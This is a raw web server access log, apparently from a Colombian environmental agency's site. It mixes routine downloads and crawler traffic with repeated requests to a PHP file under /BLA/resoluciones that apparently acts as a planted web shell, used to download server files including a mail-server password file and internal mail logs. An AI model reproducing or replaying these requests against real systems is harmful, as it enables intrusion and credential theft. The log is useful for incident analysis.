201.245.192.253 - - [19/Jun/2024:06:13:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
34.220.149.70 - - [19/Jun/2024:06:13:34 -0500] "GET /Publicaciones/2024EE121681.pdf HTTP/1.1" 200 241311
201.245.192.253 - - [19/Jun/2024:06:13:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
34.220.149.70 - - [19/Jun/2024:06:13:45 -0500] "GET /Publicaciones/2024EE97557.pdf HTTP/1.1" 404 227
49.82.201.49 - - [19/Jun/2024:06:13:47 -0500] "GET / HTTP/1.1" 200 319
34.220.149.70 - - [19/Jun/2024:06:13:51 -0500] "GET /Publicaciones/2024EE99795.pdf HTTP/1.1" 404 227
34.220.149.70 - - [19/Jun/2024:06:13:58 -0500] "GET /Publicaciones/2024EE96616.pdf HTTP/1.1" 404 227
34.220.149.70 - - [19/Jun/2024:06:14:04 -0500] "GET /Publicaciones/2024EE100767.pdf HTTP/1.1" 404 228
34.220.149.70 - - [19/Jun/2024:06:14:10 -0500] "GET /Publicaciones/2024EE123385.pdf HTTP/1.1" 200 241741
34.220.149.70 - - [19/Jun/2024:06:14:17 -0500] "GET /Publicaciones/2024EE100766.pdf HTTP/1.1" 404 228
201.245.192.253 - - [19/Jun/2024:06:14:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
34.220.149.70 - - [19/Jun/2024:06:14:23 -0500] "GET /Publicaciones/2024EE99734.pdf HTTP/1.1" 404 227
34.220.149.70 - - [19/Jun/2024:06:14:30 -0500] "GET /Publicaciones/2024EE123384.pdf HTTP/1.1" 200 241793
201.245.192.253 - - [19/Jun/2024:06:14:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
34.220.149.70 - - [19/Jun/2024:06:14:37 -0500] "GET /Publicaciones/2024EE100765.pdf HTTP/1.1" 404 228
34.220.149.70 - - [19/Jun/2024:06:14:46 -0500] "GET /Publicaciones/2024EE97768.pdf HTTP/1.1" 404 227
34.220.149.70 - - [19/Jun/2024:06:14:53 -0500] "GET /Publicaciones/2024EE121978.pdf HTTP/1.1" 200 384986
34.220.149.70 - - [19/Jun/2024:06:15:02 -0500] "GET /Publicaciones/2024EE121977.pdf HTTP/1.1" 200 318905
34.220.149.70 - - [19/Jun/2024:06:15:10 -0500] "GET /Publicaciones/2024EE120631.pdf HTTP/1.1" 200 242465
34.220.149.70 - - [19/Jun/2024:06:15:18 -0500] "GET /Publicaciones/2024EE123266.pdf HTTP/1.1" 200 1361631
172.22.2.4 - - [19/Jun/2024:06:13:48 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:15:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
34.220.149.70 - - [19/Jun/2024:06:15:30 -0500] "GET /Publicaciones/2024EE120967.pdf HTTP/1.1" 200 2340165
201.245.192.253 - - [19/Jun/2024:06:15:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
34.220.149.70 - - [19/Jun/2024:06:15:50 -0500] "GET /Publicaciones/2024EE99755.pdf HTTP/1.1" 404 227
34.220.149.70 - - [19/Jun/2024:06:15:56 -0500] "GET /Publicaciones/2024EE97432.pdf HTTP/1.1" 404 227
66.249.66.21 - - [19/Jun/2024:06:16:02 -0500] "GET /Publicaciones/2024EE128325.pdf HTTP/1.1" 200 242239
66.249.66.20 - - [19/Jun/2024:06:16:03 -0500] "GET /Publicaciones/2024EE62849.pdf HTTP/1.1" 404 227
34.220.149.70 - - [19/Jun/2024:06:16:02 -0500] "GET /Publicaciones/2024EE123223.pdf HTTP/1.1" 200 1137751
34.220.149.70 - - [19/Jun/2024:06:16:12 -0500] "GET /Publicaciones/2024EE99464.pdf HTTP/1.1" 404 227
47.128.17.150 - - [19/Jun/2024:06:16:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Ctomcat%5Cbin&f=configtest.bat&ft=download HTTP/1.1" 200 2131
172.22.2.4 - - [19/Jun/2024:06:14:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [19/Jun/2024:06:16:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
186.102.2.178 - - [19/Jun/2024:06:16:23 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19cZGFIbUCuYj3D8TTgtVnZ2m3PU1W8anuKwvaxcKO22ELDvqwmNMEq&y=U2FsdGVkX19YOzfMcISk9iZw0pgtcHMPHd6bQhtiFFveRbks6MFtyuc5Lbwu1urx HTTP/1.1" 200 30
186.102.2.178 - - [19/Jun/2024:06:16:24 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19jBeJpljqWyJ11rLh5EFKsnHUyHSyz239LLYDpTv1OT/RCIdRP8bmRWFTmeqRiFNKnsm5PH5DYS7C3n5TG7hpK4RLGeqzPlLM=&u=U2FsdGVkX18oowHtERYBuWifRT4mamiSGrl6mguPm6mcWG2HhStVaN84hsQ14Wzl&y=U2FsdGVkX19YOzfMcISk9iZw0pgtcHMPHd6bQhtiFFveRbks6MFtyuc5Lbwu1urx HTTP/1.1" 200 97
186.102.2.178 - - [19/Jun/2024:06:16:24 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19L59oUhoz66jjN25sOMFeMb23FCov2Z48CaKBDKDvAMQFos1F+8bBXzOLVUjoVZIyUO8EJBtBmoMsZk6Iz84Odwq/Co97AgmsGVPQLc/7S8DQHM+IChoZNOjXxGYGukEwDx29VbZOI55M40Xf1ooPPdn7Thn24P1skp6ZcOS48/H+tmra+FS0Zq7FIdOWvCVOM3niT7Ki8OPnkh8ZBvq3BB5yOYMqB0ujlmP+eLWtHe53YS3LkNO2+y6qTdqowaPd50GIQ2UhOwexD3Bqxo6gnJhEW9y7H3kNeaN39ugXUkcmuGS9XYVby5sYT3JURwOQoBAMA46PHyQlAQbNcG0CoYJIgFeoaB0FGcrbTo+TWG0BaINyhR5Rx2f6N3BZRbZS5PPkrWa93kBqqFK3he12Uijcs6RmkTSe9KrnUzMQsxAr/nXhWp1hsiIh1xchFtB7h2uA/wLbO2mofPw+bNjl+k+62EW+0HcZsAxuj3yjmIO6NTOKdBmWqq4uZMb8LqZ45MsLvak5R+zLgNQ311td+Zec6tqvRAs0nTSgfTBhtO5bM+1MgyKipOpvNef+twVkCW6BfGMCPYxSmHwg1rMEPIKqO+zs1beZmrWev518ANMqC0L/ryNm2U2V+KWXpEfiQEc135gmd1bJ9nR1lnq94oYG1ktxdZeMAkPVc+8n63drDCzCvY4OhcutpIs4oEsDDe9IKZgbudiQHQ/acoBGzQikyFdXzS8Kb9Q70V9ch2Y9JybgkD4ClUT3l1wxAtyu8kZQinjqoc/PUj/bZm4USZvkGxCat2pnLcKvZGi5bfFOTufCTScnfc1EXVfCe1adg6gDFaNcNiWoRhlQk4LrWhzPyRh0UjVc7uyJF1ULZePJrfb5EQBPzH9hUEPvw/t5U5WbVkLOA1iKoiRoz/syo1AA8ld4KbqjCvWS8mHei9TfCQK+aCklvrGyLnL1uIfeFOp6+FzmolIB6e5keHE3ikpCk7IBqcLsIgrwoHlbRY/A4Dz3SxNmsOQwbBAzabSdqZvx9mcFMujONrCn9OxFTlGoo4Sh6oO6MCqcuUiq35bJmePnFy4CQSTSloV63o2/R+UZ9AnMGlIV26jkHxpJux8b0TZtI16SL+K3paTHnsxlnjJ+NzvspHbIH8mGNMDG9mDPeZjkCg6Tdosx54DhxOMkamz5UyLbW2bmSbgy0rYgpI8vrYpDl7f8jb2VXDzNB8nhAamFGV6dEdVI51LFRxVRFVEzQDva5FOVZUB80+6NXxP1l0O4OMVkZKtd2EGtMy2EUxdYxvlWBjAgQ7PsZlJA9l0s0nh83Ox5ZIlh45vydsgQ2h+oS35zZeSraTj5MBWHJW2SC2rdGyAZEzTcYvVynczjx50hietlhBfhBEw6WlpQ5kHdID+hMSPCWLLLNLPis9s3wnmsXP2JnVcTjhteTQ+HRn7nG42rQvCY56ey/MvxAZimXz7vmnnQ0DOqlRThPg/6Z8qw5CbETkNgWlAILS3GWBcOd/NBLifPcxrxjZDXEsrgfpxQ+WgZMQgroJMr0q6p9x7Fx1/frPgr5LXKv5RLhy5NZ79iyvLDVnyyTtYc/+BURDZ2JKbK7tFo9+uLF/BkBinnIk8IORrmC4RLptwV3djnQ8WgS6vn1xiOVjuwWiS2vXA0yE3M4s8W8pC4hC9ZC8ytIm6P3iEjZZySa5o7ITIjFrVOwMCdLD6I1Ych/oNVqKxzReClBn32qSOEG4d8G2m01zwOOPERgqnCfgCtA37bO97yr1sSMkCFYEnXnPhDA&u=U2FsdGVkX18oowHtERYBuWifRT4mamiSGrl6mguPm6mcWG2HhStVaN84hsQ14Wzl&y=U2FsdGVkX19YOzfMcISk9iZw0pgtcHMPHd6bQhtiFFveRbks6MFtyuc5Lbwu1urx HTTP/1.1" 200 1235
186.102.2.178 - - [19/Jun/2024:06:16:24 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Ex9O6ZDRoFvwbOoc3wucI0JAkkbTXPXuAgn4FhfIoenMKn+uh/pe2PaJ4+ZIXwup8ANe5RiqR8retLn8xLi8bySIHgOfWzgllpj0JDvRUEOpSLJCX3Tchr3ue7HQ9WCOfs8fGPmw9OsJmjcjNK/LOGhM8K8zTNtyWM+15a+MZX54R7+NhLyO4qUHswAl7idoA8XB7LmaKQ1TS+GYiEMSHTYvHzTwZJwMn6ThgOn1evtlO9kXfCcA/PsPz8K7mFl7KdUm3/0iCa+8s4Lckg/5reJGzTrI8Qk/KKevVM6FxiAHbCk83Pl0uxYrSnG8z2/k+AoTmZUIaS7YgPYkpp37EHkMA8hw0KTudPwS7iwnoZ2YZElaDocfbBb0E0afTGPkF5zzeZ/1LiIxLTRYIq8d0PxVDqLLuuaucWTSkt2igOiXlTJpCK45+0WNabsYU4ZMKO571gID9Evs1oQhEoWMZWfP4i2vvbBRRWXWrZTmF9ECUn0vqrJTwjEPriOd6cz4aZ0WsxtTv1RWZwdkWTIsdghRiQTCryrqmV0G6+QUqd6S1EtS875NcKQinw692ZsJqJBs5+sAcKcDQBiZ9idBf/KUpjNA5jG8wfhSRWsLlT0DWzcVFQKm88GCW8w8PaXcXF42y60IuS9aejyuqKiRujbH+Tm3Pd/9/Vfl3tyzEcRPj3CFksutF5Baf4zgBMWygPs7YF1b8Tqt8NsVBr4oKkdOukcnTZ32qa3IYJOOTovwjHOOcKxxk&u=U2FsdGVkX18oowHtERYBuWifRT4mamiSGrl6mguPm6mcWG2HhStVaN84hsQ14Wzl&y=U2FsdGVkX19YOzfMcISk9iZw0pgtcHMPHd6bQhtiFFveRbks6MFtyuc5Lbwu1urx HTTP/1.1" 200 208
186.102.2.178 - - [19/Jun/2024:06:16:24 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX19cZGFIbUCuYj3D8TTgtVnZ2m3PU1W8anuKwvaxcKO22ELDvqwmNMEq HTTP/1.1" 200 30244
47.128.38.71 - - [19/Jun/2024:06:16:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page92.swf&ft=download HTTP/1.1" 200 35092
201.245.192.253 - - [19/Jun/2024:06:16:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.47.216 - - [19/Jun/2024:06:16:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ccosmeticos%5Cimages&f=page61.swf&ft=download HTTP/1.1" 200 20134
176.9.137.113 - - [19/Jun/2024:06:16:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/5453.pdf HTTP/1.1" 200 988834
47.128.38.94 - - [19/Jun/2024:06:16:46 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Cmetalmecanica%5Cimages&f=page28.swf&ft=download HTTP/1.1" 200 83726
66.249.66.21 - - [19/Jun/2024:06:16:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4792.pdf HTTP/1.1" 200 379686
47.128.17.137 - - [19/Jun/2024:06:16:57 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150907-1630-277000.txt&ft=download HTTP/1.1" 200 679
47.128.24.3 - - [19/Jun/2024:06:17:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Ccumbredelclima%5Cwp-includes%5Cjs%5Cjquery&f=jquery.js&ft=download HTTP/1.1" 200 95952
47.128.111.201 - - [19/Jun/2024:06:17:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=C%3A%5CAmbienteBogota%5Cautoliquidacion&f=index.htm&ft=download HTTP/1.1" 200 10602
47.128.121.113 - - [19/Jun/2024:06:17:29 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CResiduos%5Ctextiles%5Cimages&f=page61.swf&ft=download HTTP/1.1" 200 55395
216.245.221.92 - - [19/Jun/2024:06:17:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:17:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.32.66 - - [19/Jun/2024:06:17:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5C&f=predis.txt&ft=download HTTP/1.1" 200 141
201.245.192.253 - - [19/Jun/2024:06:17:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:17:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33733
201.245.192.253 - - [19/Jun/2024:06:16:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [19/Jun/2024:06:17:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33750
47.128.113.148 - - [19/Jun/2024:06:17:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400&f=00000352.tif&ft=download HTTP/1.1" 200 20131
156.59.198.135 - - [19/Jun/2024:06:18:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_svg HTTP/1.0" 200 1034
156.59.198.135 - - [19/Jun/2024:06:18:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_info_bin HTTP/1.0" 200 1034
34.79.162.186 - - [19/Jun/2024:06:18:18 -0500] "GET / HTTP/1.1" 200 319
40.77.167.56 - - [19/Jun/2024:06:18:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2768.pdf HTTP/1.1" 200 515922
201.245.192.253 - - [19/Jun/2024:06:18:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
156.59.198.136 - - [19/Jun/2024:06:18:22 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_hr6qnebn82mq6gl5n6re9iarr5 HTTP/1.0" 200 1034
216.244.66.195 - - [19/Jun/2024:06:18:29 -0500] "GET /BLA/resoluciones/AUTOS%202012/0144.pdf HTTP/1.1" 200 1576901
201.245.192.253 - - [19/Jun/2024:06:18:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.21 - - [19/Jun/2024:06:18:44 -0500] "GET /autoliquidacion/Auto%20Declaraci%C3%B3nTr%C3%A1mite%20de%20Licenciamiento%20Urban%C3%ADstico%20y%20Actos%20de%20Reconocimiento%20de%20Usos%20Industriales/Anexo%202.%20Autodeclaraci%C3%B3n%20por%20impacto%20ambiental%20-%20Producci%C3%B3n%20artesanal%20e%20industria%20livian.pdf HTTP/1.1" 304 -
185.191.126.213 - - [19/Jun/2024:06:18:45 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [19/Jun/2024:06:19:00 -0500] "GET /BLA/resoluciones/AUTOS%202012/0294.pdf HTTP/1.1" 200 336790
201.245.192.253 - - [19/Jun/2024:06:18:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 14501
201.245.192.253 - - [19/Jun/2024:06:19:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [19/Jun/2024:06:19:12 -0500] "GET /BLA/resoluciones/AUTOS%202012/0439.pdf HTTP/1.1" 200 164410
216.244.66.195 - - [19/Jun/2024:06:19:21 -0500] "GET /BLA/resoluciones/AUTOS%202012/0505.pdf HTTP/1.1" 200 356543
216.244.66.195 - - [19/Jun/2024:06:19:30 -0500] "GET /BLA/resoluciones/AUTOS%202012/0708.pdf HTTP/1.1" 200 234470
201.245.192.253 - - [19/Jun/2024:06:19:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.212 - - [19/Jun/2024:06:19:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/3045.pdf HTTP/1.1" 200 1225943
216.244.66.195 - - [19/Jun/2024:06:19:40 -0500] "GET /BLA/resoluciones/AUTOS%202012/0830.pdf HTTP/1.1" 200 314992
201.245.192.253 - - [19/Jun/2024:06:19:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:19:44 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33225
216.244.66.195 - - [19/Jun/2024:06:19:48 -0500] "GET /BLA/resoluciones/AUTOS%202012/0880.pdf HTTP/1.1" 200 335567
216.244.66.195 - - [19/Jun/2024:06:19:55 -0500] "GET /BLA/resoluciones/AUTOS%202012/1347.pdf HTTP/1.1" 200 160564
216.244.66.195 - - [19/Jun/2024:06:20:02 -0500] "GET /BLA/resoluciones/AUTOS%202012/1358.pdf HTTP/1.1" 200 158436
201.245.192.253 - - [19/Jun/2024:06:20:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
216.244.66.195 - - [19/Jun/2024:06:20:17 -0500] "GET /BLA/resoluciones/AUTOS%202012/1548.pdf HTTP/1.1" 200 283892
201.245.192.253 - - [19/Jun/2024:06:20:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:20:27 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33750
104.209.33.54 - - [19/Jun/2024:06:20:29 -0500] "GET /druid/index.html HTTP/1.1" 404 1018
201.245.192.253 - - [19/Jun/2024:06:20:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [19/Jun/2024:06:20:55 -0500] "GET /BLA/resoluciones/AUTOS%202012/1564.pdf HTTP/1.1" 200 1990552
156.59.198.136 - - [19/Jun/2024:06:21:07 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_sess_rqi2agcqokbht2kpmub9uk4rt2 HTTP/1.0" 200 1034
172.22.2.4 - - [19/Jun/2024:06:19:38 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:21:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:21:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [19/Jun/2024:06:21:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%201996/0313.pdf HTTP/1.1" 200 207199
172.22.2.4 - - [19/Jun/2024:06:20:29 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56191
216.244.66.195 - - [19/Jun/2024:06:22:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0213.pdf HTTP/1.1" 200 581814
201.245.192.253 - - [19/Jun/2024:06:22:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [19/Jun/2024:06:22:32 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:22:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
156.59.198.136 - - [19/Jun/2024:06:22:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/%3C?act=img&img=ext_ini HTTP/1.0" 403 1006
172.22.2.4 - - [19/Jun/2024:06:21:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Jun/2024:06:22:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/0956.pdf HTTP/1.1" 200 5455637
66.249.66.21 - - [19/Jun/2024:06:23:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/9358.pdf HTTP/1.1" 200 491517
201.245.192.253 - - [19/Jun/2024:06:23:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [19/Jun/2024:06:23:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [19/Jun/2024:06:23:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2319.pdf HTTP/1.1" 200 362656
216.244.66.195 - - [19/Jun/2024:06:24:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1678.pdf HTTP/1.1" 200 3121336
201.245.192.253 - - [19/Jun/2024:06:24:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [19/Jun/2024:06:24:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.212 - - [19/Jun/2024:06:24:34 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12736
52.167.144.212 - - [19/Jun/2024:06:24:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2288.pdf HTTP/1.1" 200 363168
52.167.144.214 - - [19/Jun/2024:06:24:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=LOt1wbUY9oNvuZmOkpKWkdc8.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
52.167.144.212 - - [19/Jun/2024:06:24:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=LOt1wbUY9oNvuZmOkpKWkdc8.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
157.55.39.200 - - [19/Jun/2024:06:24:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=LOt1wbUY9oNvuZmOkpKWkdc8.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
157.55.39.200 - - [19/Jun/2024:06:24:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=LOt1wbUY9oNvuZmOkpKWkdc8.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
66.249.66.19 - - [19/Jun/2024:06:24:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4572.pdf HTTP/1.1" 200 146244
52.167.144.212 - - [19/Jun/2024:06:25:00 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=LOt1wbUY9oNvuZmOkpKWkdc8.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
52.167.144.212 - - [19/Jun/2024:06:25:00 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=LOt1wbUY9oNvuZmOkpKWkdc8.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
216.244.66.195 - - [19/Jun/2024:06:24:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1738.pdf HTTP/1.1" 200 5114631
201.245.192.253 - - [19/Jun/2024:06:25:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 36347
47.128.58.172 - - [19/Jun/2024:06:25:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail%5CMLSS%5C&f=fpass.mer&ft=download HTTP/1.1" 200 534
47.128.110.32 - - [19/Jun/2024:06:25:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400%5C&f=00000357.tif&ft=notepad HTTP/1.1" 200 245445
201.245.192.253 - - [19/Jun/2024:06:25:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.58.160 - - [19/Jun/2024:06:25:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+201-250%5C&f=00000211.tif&ft=notepad HTTP/1.1" 200 40752
44.227.38.253 - - [19/Jun/2024:06:25:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [19/Jun/2024:06:25:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d61d0d9576dbc541fdbee5a484bc6a3672.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.32.206 - - [19/Jun/2024:06:25:45 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CMercuryMail&f=stdsub_2.mer&ft=download HTTP/1.1" 200 4007
216.244.66.195 - - [19/Jun/2024:06:25:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1887.pdf HTTP/1.1" 200 400746
47.128.27.124 - - [19/Jun/2024:06:25:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput&f=mail-20150905-1354-244000.txt&ft=download HTTP/1.1" 200 653
47.128.117.202 - - [19/Jun/2024:06:26:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400&f=00000357.tif&ft=download HTTP/1.1" 200 245411
47.128.63.167 - - [19/Jun/2024:06:26:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CRESOLUCIONES+2006%5CRES+2006+351-400&f=00000369.tif&ft=download HTTP/1.1" 200 87506
201.245.192.253 - - [19/Jun/2024:06:26:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d62ce8354ab2c04ae981fa8f2fd69b26f6.e3iSbxaKaheRe34Ra3iRa3mMah50n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [19/Jun/2024:06:26:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/2436.pdf HTTP/1.1" 200 364263
47.128.63.17 - - [19/Jun/2024:06:26:27 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5Cxampp%5C&f=AnkeCalligraph.fdb&ft=download HTTP/1.1" 200 15254
201.245.192.253 - - [19/Jun/2024:06:26:32 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [19/Jun/2024:06:26:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 16331
